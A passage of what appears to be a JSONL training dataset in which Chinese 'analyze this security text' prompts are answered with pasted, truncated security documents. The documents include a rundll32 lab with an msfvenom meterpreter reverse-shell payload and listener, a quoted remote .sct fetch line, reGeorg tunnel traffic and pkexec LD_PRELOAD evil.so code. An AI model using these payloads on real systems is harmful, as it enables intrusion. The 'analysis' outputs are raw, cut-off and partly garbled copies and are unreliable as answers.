msg); } int main(int argc, char **argv, char **envp) { char c; while((c = getopt(argc, argv, \"d:v\")) != -1) { switch(c) { case 'd': globals.debugfile = fopen(optarg, \"w+\"); if(globals.debugfile == NULL) err(1, \"Unable to open %s\", optarg); setvbuf(globals.debugfile, NULL, _IONBF, 0); break; case 'v': globals.verbose++; break; } } dprintf(\"Starting up. Verbose level = %d\\n\", globals.verbose); setresgid(getegid(), getegid(), getegid()); setresuid(geteuid(), geteuid(), geteuid()); while(1) { char line[256]; char *p, *q; q = fgets(line, sizeof(line)-1, s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1218-011-win-基于白名单Zipfldr.dll执行Payload ## 来自ATT&CK的描述 Rundll32.exe程序可以调用来执行任意二进制文件攻击者可能会利用此功能来代理执行代码从而避免触发那些可能不会监控rundll32.exe进程执行的安全工具因为正常操作中使用rundll32.exe的Windows会有白名单或误报 Rundll32.exe可用于通过未记录的shell32.dll函数Control_RunDLL和 Control_RunDLLAsUser来执行控制面板项目文件.cpl双击.cpl文件也会触发rundll32.exe执行 Rundll32也可用于执行JavaScript等脚本可以使用类似于下面的语法来完成rundll32.exe javascript:\"..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" 这种方法已被恶意软件如Poweliks所使用 ## 测试案例 zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件同样该工具支持WinXP-Win10 全版本zipfldr.dll所在路径已被系统添加PATH环境变量中因此zipfldr.dll命令可识别但由于为dll文件需调用rundll32.exe来执行 补充说明在高版本操作系统中可以通过配置策略对进程命令行参数进行记录日志策略开启方法`本地计算机策略>计算机配置>管理模板>系统>审核进程创建>在过程创建事件中加入命令行>启用`同样也可以在不同版本操作系统中部署sysmon通过sysmon日志进行监控 Windows 2003 默认位置 C:\\Windows\\System32\\zipfldr.dll C:\\Windows\\SysWOW64\\zipfldr.dll Windows 7 默认位置 C:\\Windows\\System32\\zipfldr.dll C:\\Windows\\SysWOW64\\zipfldr.dll ## 检测日志 windows 安全日志需要自行配置 ## 测试复现 ### 环境准备 攻击机Kali2019 靶机windows server 2012 ### 攻击分析 #### 生成payload.dll ```bash root@12306Br0:~# msfvenom -p windows/meterpreter/reverse_tcp -b '\\x00\\x0b' LHOST=192.168.126.146 LPORT=4444 -f exe > shell.exe ``` #### 执行监听 攻击机,注意配置set AutoRunScript migrate f (AutoRunScript是msf中一个强大的自动化的后渗透工具这里migrate参数是迁移木马到其他进程) ```bash msf5 > use exploits/multi/handler msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.126.146 lhost => 192.168.126.146 msf5 exploit(multi/handler) > set lport 4444 lport => 4444 msf5 exploit(multi/handler) > set AutoRunScript migrate f AutoRunScript => migrate f msf5 exploit(multi/handler) > exploit ``` #### 靶机执行payload ```cmd rundll32.exe zipfldr.dll,RouteTheCall .\\shell.exe #shell.exe存放路径下执行 ``` #### 反弹shell ```bash msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.126.146:4444 [*] Sending stage (180291 bytes) to 192.168.126.156 [*] Meterpreter session 6 opened (192.1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPage 1 of 1  2003 Airscanner Corp. http://www.Airscanner.com Embedded Reverse Engineering: Cracking Mobile Binaries 1. Overview Reverse-engineering has long been one of the most popular trouble shooting techniques. In fact, long before the first hacker ever laid eyes on a computer screen, technicians, engineers, and even hobbyists were busy tearing apart mechanical devices to see if they could deduce their seemingly magical operations with the hopes of making it work better, or at the very least, hoping they could understanding what made a device tick. Over the years, this concept has been passed on to the computer profession, where the concept of reverse-engineering evolved into one of the most powerful methods of learning available. Ironically, this very useful technique has fallen under attack and is being threatened by various nefarious Acts and policy control groups. If a computer professional has been in the field for any length of time, they have already used reverse-engineering to their benefit. In fact, the open-source community uses reverse-engineering as one of their main tools for learning software and figuring out what a program does, or in some cases, doesn't do. However, there is one major branch of computing that has had little headway in the arena of reverse-engineering. This elusive niche is the PocketPC application. To help fill this gap, and to increase the awareness of PocketPC reverse-engineering, this paper/discussion will provide an overview of what is required, and how one can reverse their PocketPC. The following pages will provide an overview of the PocketPC environment, the tools required to successfully reverse-engineering Windows CE, and the methods by which a person can dig deep inside an application to alter code as they see fit. Note, this article/discussion will skirt the borders of many ethical and moral issues. The Page 2 of 2  2003 Airscanner Corp. http://www.Airscanner.com information in this paper is presented from a researcher", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1505-003-Regeorg-HTTP隧道检测 ## 来自ATT&CK的描述 攻击者可能会通过Web Shell为web服务器创建后门以便实现对系统的持久访问Web Shell是攻击者放置在可公开访问的web服务器上的web脚本以便通过web服务器进入网络Web Shell可以提供一套待执行的函数或是为web服务器所在系统提供命令行界面 除服务器端脚本之外Web Shell可能还有客户端接口程序用于与web服务器通信例如[China Chopper](https://attack.mitre.org/software/S0020)引自Lee 2013 ## ReGeorg简介 reGeorg是reDuh的继承者利用了会话层的socks5协议效率更高结合Proxifier使用Proxifier是一款功能非常强大的socks5客户端可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链 ## 测试案例 reGeorg搭建HTTP隧道和流量分析 <https://cloud.tencent.com/developer/article/1779195> ## 检测日志 HTTP_log ## 测试复现 参考测试案例文章链接 ## 测试留痕 kali 在kali上抓包然后访问内网tcpdump抓包分析流量 tcpdump -ieth0 -wkali.pcap 然后打开wireshark追踪tcp流看流量 ```yml ...............P.........PGET /login.php HTTP/1.1 Host: 172.17.0.2 User-Agent: curl/7.68.0 Accept: */* HTTP/1.1 200 OK Date: Thu, 17 Dec 2020 16:39:09 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.25 Set-Cookie: PHPSESSID=7mhcg05sbeerpgjvthqad6r7t6; path=/ Expires: Tue, 23 Jun 2009 12:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=7mhcg05sbeerpgjvthqad6r7t6; path=/; httponly Set-Cookie: security=impossible; httponly Vary: Accept-Encoding Content-Length: 1567 Content-Type: text/html;charset=utf-8 <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"> ``` serverA 在serverA上抓包第一个流可以看到服务器A作为跳板表明服务器与哪台内网主机的哪个端口连接cmd=connecttarget=172.17.0.2 目标内网ipport=80 端口为80 ```yml POST http://182.x.x.x:8080/tunnel.jsp? cmd=connect&target=172.17.0.2&port=80 HTTP/1.1 Host: 182.x.x.x:8080 Accept-Encoding: identity Content-Length: 0 X-CMD: CONNECT X-PORT: 80 X-TARGET: 172.17.0.2 User-Agent: python-urllib3/1.26.2 HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnly X-STATUS: OK Content-Type: text/html Content-Length: 0 Date: Thu, 17 Dec 2020 16:44:45 GMT ``` 下一条流cmd=read,代表是去访问内网的内容 Accept-Encoding: identity请求的HTTP头通告其内容编码只要没有被明确禁止 服务器就不能发回406 Not Acceptable错误 响应包头Transfer-Encoding: chunked代表", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nversion: '2' services: web: image: vulhub/v2board:1.6.1 ports: - \"8080:80\" depends_on: - db - redis entrypoint: - bash - /entrypoint.sh volumes: - ./entrypoint.sh:/entrypoint.sh command: apache2-foreground db: image: mysql:5.7 environment: - MYSQL_ROOT_PASSWORD=root - MYSQL_DATABASE=v2board redis: image: redis:7-alpine", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup Tokyo Westerns CTF 2017 Team: c7f.m0d3, shalom, akrasuski1, nazywam, psrok1, cr019283, msm ### Table of contents * [My simple cipher (crypto)](crypto_simple) * [Freshen uploader (web)](web_uploader) * [Baby RSA (crypto)](crypto_rsa) * [Private Local Comment (ppc)](ppc_plc) * [Baby DLP (crypto)](crypto_dlp) * [Baby Pinhole (crypto)](crypto_pinhole)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nZoomEye(钟馗之眼) 网络空间搜索引擎 项目简介及技术架构 张弘引(小雨) 2013- 08 我和我的小伙伴们 春哥  Java 达人 张波  Django  WebUI pnig0s 小P  小  Powerful pw  小  纯洁 小雨  猥琐 大叔 目录  ZoomEye是什么  ZoomEye的诞生原因  ZoomEye的对象  ZoomEye的使用方法  ZoomEye的优势  ZoomEye的技术细节  ZoomEye的未来展望 ZoomEye是什么  它是一个搜索引擎  搜索对象是网络空间中的WEB服务组件 和网络设备  基于我们长期积累的安全研究能力  为白帽子黑客和极客服务的  兼顾宏观和微观 ZoomEye长什么样 What is ZoomEye  搜索引擎  针对WEB应用  宏观  安全 目录  ZoomEye是什么  ZoomEye的诞生原因  ZoomEye的对象  ZoomEye的使用方法  ZoomEye的优势  ZoomEye的技术细节  ZoomEye的未来展望 目录  ZoomEye是什么  ZoomEye的诞生原因  ZoomEye的对象  ZoomEye的使用方法  ZoomEye的优势  ZoomEye的技术细节  ZoomEye的未来展望 ZoomEye的对象  Web服务组件  基于域名  可识别的网络设备  基于IP地址  尚未开放 WEB服务组件 可识别网络设备  交换机  路由器  摄像头  手机  平板电脑  工控设备  核工业设备   目录  ZoomEye是什么  ZoomEye的诞生原因  ZoomEye的对象  ZoomEye的使用方法  ZoomEye的优势  ZoomEye的技术细节  ZoomEye的未来展望 ZoomEye的使用方法  搜应用/版本  搜国家/城市  搜网站标题  搜网站域名,如 site:*.baidu.com  特殊词语如 hacked by  搜行业关键字银行大学人 民政府  搜网络设备如 GoAhead-Webs ZoomEye的使用方法(2) ZoomEye的使用方法(3) ZoomEye的使用方法(4) ZoomEye的使用方法(5) ZoomEye的使用方法(6) ZoomEye的使用方法(7)  http://www.myhack58.com/Article/htm l/3/8/2013/39616.htm 关于ZoomEye的 一个入侵小例子  http://www.freebuf.com/articles/web/1 0918.html 如何用ZoomEye钟馗之眼 批量获得站点权限 目录  ZoomEye是什么  ZoomEye的诞生原因  ZoomEye的对象  ZoomEye的使用方法  ZoomEye的优势  ZoomEye的技术细节  ZoomEye的未来展望 ZoomEye的优势  更专业  更全面  更高效 目录  ZoomEye是什么  ZoomEye的诞生原因  ZoomEye的对象  ZoomEye的使用方法  ZoomEye的优势  ZoomEye的技术细节  ZoomEye的未来展望 ZoomEye的技术细节  ZoomEye的整体架构  ZoomEye的调度逻辑  ZoomEye的Wmap应用指纹识别  一些技术上的Tips分享 ZoomEye的整体架构 架构图 ZoomEye的调度逻辑 调度逻辑  取最久未调度过的站点列表  通过接口向Job Server下发探测任务  Worker从Job Server领取任务执行  轮询接口取结果  写入完成的任务  纪录失败的任务  对失败的任务进行有限的重试 Wmap应用指纹识别 如何识别码农来着 如何识别Web应用 以nginx和php为例 HTTP/1.1 200 OK Server: nginx/1.4.2 Date: Sun, 18 Aug 2013 10:33:12 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.5.2 如何识别多种应用  不同层次的应用有不同的策略  符合标准格式的未知指纹直接收录  收集多种应用的指纹逐个匹配 如何识别得更快 1. 先判断域名的合法性及是否存活 2. 特定文件的md5值比如favicon.ico 3. 用压缩的传输提高传输速度 4. 尽量减少请求次数和请求的大小 5. 减少进行规则比较的次数 6. 结果缓存一个月 误报和漏报 Tips  针对新增的应用指纹特征进行单一规则的 增补识别调度  周期进行站点的存活判断  Fuzz常见的子域名子目录来发现更多应用 Elasticsearch tips 1. Ja", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTelerik.Web.UI for ASP.NET AJAX某版本存在 任意文件下载漏洞: 在做渗透测试任务时,遇到一个ASP.NET站点.通过目录扫描发现存在 Telerik.Web.UI.WebResource.axd 路径此路径是第三方控件 Telerik UI FOR ASP.NET 在 web.config 中映射的 handler 查阅历史相关漏洞后主要有以下 CVE 2014-2217 CVE-2017-11317 CVE-2017-11357 CVE-2017-9248 CVE-2019-18935 上面这几个已知漏洞基本都是围绕默认 key 实现序列化配置类上传恶意文件,后者是前 者禁用 ../ 后的绕过存储路径以及类型都是由反序列化内容后进行解密而来 key 的 配置一般都在web.config文件中 而该系统类似于一个信息管理系统,在没有可登录账号的情况下很难挖掘一些未授权 漏洞因此,打算从 Telerik 入手挖掘其他未知漏洞 在下载对应的 Telerik.WEB.UI.dll 后,进行审计 常见的 handler 配置都是将 Telerik.Web.UI.WebResource.axd 路径的请求交给 Telerik.Web.UI 程序集下的 WebResource 类进行处理 <add path=\"Telerik.Web.UI.WebResource.axd\" type=\"Telerik.Web.UI.WebResource\" verb=\"*\" name=\"Telerik\"/> 切入 WebResource ,根据ASP.NET的方法执行顺序,该类会先执行 ProcessRequest 方法 public override void ProcessRequest(HttpContext context) { HandlerRouter handlerRouter = new HandlerRouter(); if (!handlerRouter.ProcessHandler(context)) { CombinedScriptWriter.WriteCombinedScriptFile(this, context); } } 先实例化了 HandlerRouter 类后调用 ProcessHandler 方法如果不满足if条件,则会进 入 WriteCombinedScriptFile 方法 ProcessHandler 中会先调用 ExtractKey 方法,从请求中获取参数的值 public bool ProcessHandler(HttpContext context) { string text = this.ExtractKey(context); return !string.IsNullOrEmpty(text) && this.ProcessHandler(text, context); } // Token: 0x0600362D RID: 13869 RVA: 0x000B2223 File Offset: 0x000B0423 private string ExtractKey(HttpContext context) { return context.Request[HandlerRouter.HandlerUrlKey]; } HandlerUrlKey 成员的内容为 type internal static string HandlerUrlKey { get { return \"type\"; } } 先从请求中获取变量 type 的值,不为空则进入 ProcessHandler 的重载方法,根据传入 type 内容进行分发 public bool ProcessHandler(string handlerKey, HttpContext context) { if (string.IsNullOrEmpty(handlerKey)) { throw new ArgumentNullException(\"handlerKey\"); } this.PopulateHandlers(); if (this._handlers.ContainsKey(handlerKey)) { this._handlers[handlerKey]().ProcessRequest(context); return true; } return false; } _handlers 在 PopulateHandlers 方法中被定义. protected virtual void PopulateHandlers() { this.Handlers.Add(RadBinaryImage.Ha", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\njoin === 两个文件中指定栏位内容相同的行连接起来 ## 补充说明 **join命令** 用来将两个文件中制定栏位内容相同的行连接起来找出两个文件中指定栏位内容相同的行并加以合并再输出到标准输出设备 ### 语法 ```shell join(选项)(参数) ``` ### 选项 ```shell -a<1或2>除了显示原来的输出内容之外还显示指令文件中没有相同栏位的行 -e<字符串>若[文件1]与[文件2]中找不到指定的栏位则在输出中填入选项中的字符串 -i或--ignore-case比较栏位内容时忽略大小写的差异 -o<格式>按照指定的格式来显示结果 -t<字符>使用栏位的分割字符 -v<1或2>更-a相同但是只显示文件中没有相同栏位的行 -1<栏位>连接[文件1]指定的栏位 -2<栏位>连接[文件2]指定的栏位 ``` ### 参数 * 文件1要进行合并操作的第1个文件参数 * 文件2要进行合并操作的第2个文件参数 ### 常见用法 把两个文件制定栏位内容相同的行连接起来 ```shell [root@localhost ~]# cat name 1 xiaoming 2 xiaowang 3 xiaoliu [root@localhost ~]# cat city 1 beijing beijing 2 hubei wuhan 3 hunan changsha # city文件在后则拼接在后如果city文件在前则name文件拼接在后 [root@localhost ~]# join name city 1 xiaoming beijing beijing 2 xiaowang hubei wuhan 3 xiaoliu hunan changsha ``` 把两个文件指定列拼接起来 ```shell # 把name文件的第2列和city文件的第3列拼接起来 [root@localhost ~]# join -o 1.2 2.3 name city xiaoming beijing xiaowang wuhan xiaoliu changsha ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npkexec 0x00 CVE-2021-4034pkexec CVE-2021-4034 GCONV_PATH bypass hids LD_PRELOAD LD_PRELOADGCONV_PATH 0x01 pkexec swing 1. 2. 3. so 4. RCE pkexec 638 701clearenv 638701 g_printerrGCONV_PATH clearenvLD_PRELOAD pkexec clear execvLD_PRELOAD 0x02 disable functionputenv execdisable functionputenvLD_PRELOADpkexec pkexec putenvputenvLD_PRELOAD freebufsendmailLD_PRELOADdisable_functions 1. putenvLD_PRELOAD 2. mail 3. mailLD_PRELOAD 4. getuidhook sendmail 1. putenvLD_PRELOAD 2. __attribute__ ((__constructor__)) so 3. mailsendmailloadso load LD_PRELOAD load evil.so #define _GNU_SOURCE #include <stdlib.h> #include <unistd.h> #include <sys/types.h> __attribute__ ((__constructor__)) void preloadme (void) { unsetenv(\"LD_PRELOAD\"); const char* cmdline = \"whoami\"; system(cmdline); } exec_env.c #include <unistd.h> #include <stdlib.h> #include <sys/types.h> #include <stdio.h> int main(){ char *argv[]={\"ls\",\"-al\",\"/etc/passwd\",NULL}; char *envp[]={\"PATH=/bin\",NULL}; putenv(\"LD_PRELOAD=/tmp/test/evil.so\"); execve(\"/bin/ls\",argv,envp); } gcc -shared -fPIC evil.c -o evil.so gcc exec_env.c ./a.out sowhoamistrace straceLDevil.soexecve execve(\"/bin/ls\", [\"ls\", \"-al\", \"/etc/passwd\"], 0x7fff9c625150 /* 1 var */) = 0 1 varc execvedemo #include <unistd.h> #include <stdlib.h> #include <sys/types.h> #include <stdio.h> int main(){ extern char **environ; // char *argv[]={\"ls\",\"-al\",\"/etc/passwd\",NULL}; char *envp[]={\"PATH=/bin\",NULL}; char result_buf[256]; FILE *fp; putenv(\"LD_PRELOAD=/tmp/test/evil.so\"); execve(\"/bin/ls\",argv,environ); } whoami strace environpkexecexecvexecve #include <unistd.h> #include <stdlib.h> #include <sys/types.h> #include <stdio.h> int main(){ char *argv[]={\"ls\",\"-al\",\"/etc/passwd\",NULL}; putenv(\"LD_PRELOAD=/tmp/test/evil.so\"); execv(\"/bin/ls\",\"-al\",NULL); } execve #include <unistd.h> #include <stdlib.h> #include <sys/types.h> #include <stdio.h> int main(){ char *argv[]={\"ls\",\"-al\",\"/etc/passwd\",NULL}; putenv(\"LD_PRELOAD=/tmp/test/evil.so\"); execv(\"/bin/not_exist\",argv); } ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n企业安全技术体系建设与实践 关于我 胡珀  lake2  2007年加入腾讯安全平台部  腾讯T4安全专家目前负责应用运维安全  Web漏洞扫描器恶意网址检测系统主机安全Agent建设和运营  安全事件响应渗透测试安全培训安全评估安全规范  腾讯安全应急响应中心TSRC与威胁情报奖励计划  移动安全 & 智能设备安全 关于腾讯 互联网之王囊括几乎所有的互联网业务模式安全上是巨大挑战 安全的三个阶段 救火队 -> 全面保障业务发展 -> 业务的核心竞争力 安全生命周期SDL 谷歌基础设施安全 学习谷歌先进经验 DDoS攻击防护 全国分布式防护 近源清洗  与云堤合作/终端预研中 最大防护流量 600+Gbps 常见DDoS攻击 10000+ 次攻击每月 响应时间小于10s For 腾讯云大禹/知道创宇 Anti-APT生产环境安全 缩小攻击面高危端口管控 划区治理按业务隔离 纵深防御入侵行为全过程检测 基线模型异常检测UEBA 终端防御主机安全Agent 网络防御流量分析 Anti-APT办公环境安全 缩小攻击面HTTP代理上网 划区治理按网隔离 终端防御PC/Mobile Agent 基线模型异常检测 网络防御流量分析 不要忘了BYOD和办公WiFi  数据安全 安全漏洞收敛终端漏洞 支持PCWin/MacMobileiOS/Android 静态 + 动态 安全漏洞收敛服务端漏洞 自研爬虫 插件式 7*24h 红蓝军对抗 模拟黑客从攻击者视角对业务进行渗透检验安全防护能力 数据分析 漏洞奖励计划 众包众测发现漏洞检验安全防护能力 AI应用与对抗", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2 What's the big deal about Docker/AppCanyways? We've had containers for 20 years. What new things are they bringing to the table aka how are they different from LXC and traditional containers? What these new container formats, which leverage existing technologies introduce is that they ease not just the ability to run applications in isolation but more importantly they vastly ease the build and ship parts of the equation as well. They take the ease of use of application deployment that Chef/Puppet etc to the next level while simultaneously reducing complexity at the same time. The value of this shift cannot be overstated. This value is added by wrapping the container in a metadata layer (actually multiple layers but thats another story) that describes the configuration of the container and its contents. As a result of this wrapping, are no longer just about security but are now also to all intents and purposes another packaging format with all of the benefits and downsides that come with said systems. Where this gets particularly exciting however is that this isnt limited to an individual executable being deployed but can be entire application stacks. This goes well beyond a traditional package stating what its dependencies are and enabled one stop shipping of an entire application in one fell swoop. This creates benefits for everyone from dev to qa to production regardless of the underlying development frameworks being used. It also addressed many of the problems traditionally faced by organizations trying to leverage multi-cloud or multi-cloud-account 3 application architectures. Of course, its not all rainbows and unicorns, using tools like containers does introduce their own sets of security considerations, none of which are insurmountable, but nonetheless need taking into consideration. So what are the general issues that containers introduce? Unsurprisingly, these are mostly they are a lot of the same issues that virtualization and cloud introduced over the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# pikachu-WalkThrough --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **靶场项目地址** - https://github.com/zhuifengshaonianhanlu/pikachu **知识点** - [Burte Force](#burte_force) - [基于表单的暴力破解](#基于表单的暴力破解) - [验证码绕过(on server)](#验证码绕过(on_server)) - [验证码绕过(on client)](#验证码绕过(on_client)) - [token防爆破?](#token防爆破?) - [XSS](#xss) - [反射型 xss(get)](#反射型xss(get)) - [反射性 xss(post)](#反射性xss(post)) - [存储型 xss](#存储型xss) - [DOM 型 xss](#dom型xss) - [DOM 型 xss-x](#dom型xss-x) - [xss 之盲打](#xss之盲打) - [xss 之过滤](#xss之过滤) - [xss 之 htmlspecialchars](#xss之htmlspecialchars) - [xss 之 href 输出](#xss之href输出) - [xss 之 js 输出](#xss之js输出) - [CSRF](#csrf) - [CSRF(get)](#csrf(get)) - [CSRF(POST)](#csrf(post)) - [CSRF Token](#csrf_token) - [Sql Inject](#sql_inject) - [数字型注入(post)](#数字型注入(post)) - [字符型注入(get)](#字符型注入(get)) - [搜索型注入](#搜索型注入) - [xx 型注入](#xx型注入) - [\"insert/update\" 注入](#\"insert/update\"注入) - [\"delete\" 注入](#\"delete\"注入) - [\"http header\" 注入](#\"http_header\"注入) - [盲注(base on boolian)](#盲注(base_on_boolian)) - [盲注(base on time)](#盲注(base_on_time)) - [宽字节注入](#宽字节注入) - [RCE](#rce) - [exec \"ping\"](#exec_\"ping\") - [exec \"eval\"](#exec_\"eval\") - [File Inclusion](#file_inclusion) - [本地文件包含](#本地文件包含) - [远程文件包含](#远程文件包含) - [Unsafe Filedownload](#unsafe_filedownload) - [Unsafe Fileupload](#unsafe_fileupload) - [client check](#client_check) - [MIME type](#mime_type) - [getimagesize](#getimagesize) - [Over Permission](#over_permission) - [水平越权](#水平越权) - [垂直越权](#垂直越权) - [../../ 目录遍历](#目录遍历) - [敏感信息泄露](#敏感信息泄露) - [PHP 反序列化](#php反序列化) - [XXE](#xxe) - [URL 重定向](#url重定向) - [SSRF](#ssrf) - [SSRF(curl)](#ssrf(curl)) - [SSRF(file_get_content)](#ssrf(file_get_content)) **实验环境** `环境仅供参考` - phpstudy :http://phpstudy.php.cn/ - Microsoft Windows 10 企业版 LTSC - 10.0.17763 - VMware Workstation 15 Pro - 15.0.0 build-10134415 - kali 4.19.0-kali3-amd64 - pikachu - Commits on Feb 9, 2019 --- ## 前言 优秀的 web 基础靶场,与 dvwa 相比 dvwa 更适合教学,pikachu 漏洞种类更多,建议通关顺序 dvwa --> pikachu --- ## 搭建/使用 **windows** 1. 把下载下来的 pikachu 文件夹放到 w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2012 The MITRE Corpora2on. All rights reserved. No More Hooks: Trustworthy Detec2on of Code Integrity AGacks Xeno Kovah, Corey Kallenberg, Chris Weathers, Amy Herzog, MaGhew Albin, John BuGerworth  2012 The MITRE Corporation. All rights reserved. Security SoPware Malicious SoPware Dear everyone: This system is Infected! 2  2012 The MITRE Corporation. All rights reserved. Security SoPware Malicious SoPware I don't like you. You are annoying. 3  2012 The MITRE Corporation. All rights reserved. Security SoPware Malicious SoPware I don't like you. You are annoying. *scribble* *scribble* *scribble* 4  2012 The MITRE Corporation. All rights reserved. Security SoPware Malicious SoPware Dear everyone: This system is A-OK! 5  2012 The MITRE Corporation. All rights reserved. Security SoPware Malicious SoPware That's what I'm talkin' 'bout (Bruce) Willis! 6  2012 The MITRE Corporation. All rights reserved. Security SoPware Malicious SoPware Checkmate *scan* *scan* *scan* Security SoPware is compromised! 7  2012 The MITRE Corporation. All rights reserved. Security SoPware Malicious SoPware Checkmate You are similarly annoying! *scribble* *scribble* *scribble* 8  2012 The MITRE Corporation. All rights reserved. Security SoPware is OK. Security SoPware Malicious SoPware Checkmate *scan* *scan* *scan* Don't believe me! I'm compromised! 9  2012 The MITRE Corporation. All rights reserved. Security SoPware Malicious SoPware Checkmate Are you kidding me? F*&@ self- checking tricorder This is ridiculous! *scribble* *scribble* *scribble* 10  2012 The MITRE Corporation. All rights reserved. Security SoPware is OK. Security SoPware Malicious SoPware Checkmate IamOK 11  2012 The MITRE Corporation. All rights reserved. Timing-Based AGesta2on (aka SoPware-Based AGesta2on)  Based on concept of Pioneer by Seshadri et al.  Assump2ons  You can know the client hardware profile  Your self-check is the most op2mized implementa2on  Implemented from scratch, independently confirmed previous results.  S", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nscriptreplay === 重新播放终端会话的所有操作 ## 补充说明 **scriptreplay** 用于在终端中根据 `script` 命令记录的终端数据文件和时间日志文件重现当时用户的所有操作和命令的输出信息简而言之重现播放当时终端会话发生的一切信息而不是重新运行一遍命令例如用户当时在输入某条命令时字符的键入和删除也都会被重现非常适合用于教程演示场合而且在机器 A 上面使用 `script` 命令记录终端操作可以在机器 B 上面使用 `scriptreplay` 命令重新播放 ### 语法 ```shell scriptreplay [options] [-t] timingfile [typescript [divisor]] ``` ### 选项 ```shell -t, --timing file # 记录时间日志的文件名称 -s, --typescript file # 记录终端数据信息的日志文件名称 -d, --divisor number # 表示倍速播放把时间日志文件记录的时间间隔都除以 number # -d 2 表示播放速度是原始输入单条命令的速度的两倍-d 0.1 表示播放单条命令的速度减慢 10 倍 -m, --maxdelay number # 表示命令之间的最大延迟时间单位是秒 # -m 2 表示 command.log 中存放的两条命令之间的间隔时间如果大于两秒则按两秒执行播放 -V, --version # 显示版本信息并退出 -h, --help # 显示帮助文本并退出 ``` ### 参数 * 时间日志文件存储时间日志信息的文件名称 * 终端数据文件存储终端数据信息的文件名称 ### 实例 ```shell # 重新播放终端内容默认第一个参数是时间日志第二个参数是终端数据文件 scriptreplay time.file command.log # 重新播放终端内容播放快进速度为 1 命令之间最大延时为 2 秒 scriptreplay -d 1 -m 2 -t time.file -s command.log ``` **记录终端内容到文件** ```shell zfb@localhost:~$ script -t 2>time.file -a -f command.log Script started, file is command.log zfb@localhost:~$ echo \"hello, world\" hello, world zfb@localhost:~$ echo $(date \"+%Y-%m-%d %H:%M:%S\") 2020-12-23 20:48:46 zfb@localhost:~$ echo \"Bye\" Bye zfb@localhost:~$ ls -al total 20 drwxr-xr-x 2 zfb zfb 4096 Dec 23 20:48 . drwxr-xr-x 37 zfb zfb 4096 Dec 23 20:49 .. -rw-r--r-- 1 zfb zfb 0 Dec 23 19:03 a.txt -rw-r--r-- 1 zfb zfb 12 Dec 23 19:04 b.txt -rw-r--r-- 1 zfb zfb 2744 Dec 23 20:49 command.log -rw-r--r-- 1 zfb zfb 790 Dec 23 20:49 time.file zfb@localhost:~$ exit Script done, file is command.log zfb@localhost:~$ ``` **重新播放终端内容** ```shell zfb@localhost:~$ scriptreplay -d 1 -m 2 -t time.file -s command.log zfb@localhost:~$ echo \"hello, world\" hello, world zfb@localhost:~$ echo $(date \"+%Y-%m-%d %H:%M:%S\") 2020-12-23 20:48:46 zfb@localhost:~$ echo \"Bye\" Bye zfb@localhost:~$ ls -al total 20 drwxr-xr-x 2 zfb zfb 4096 Dec 23 20:48 . drwxr-xr-x 37 zfb zfb 4096 Dec 23 20:49 .. -rw-r--r-- 1 zfb zfb 0 Dec 23 19:03 a.txt -rw-r--r-- 1 zfb zfb 12 Dec 23 19:04 b.txt -rw-r--r--", "category": "text_analysis", "source": "security_papers"}
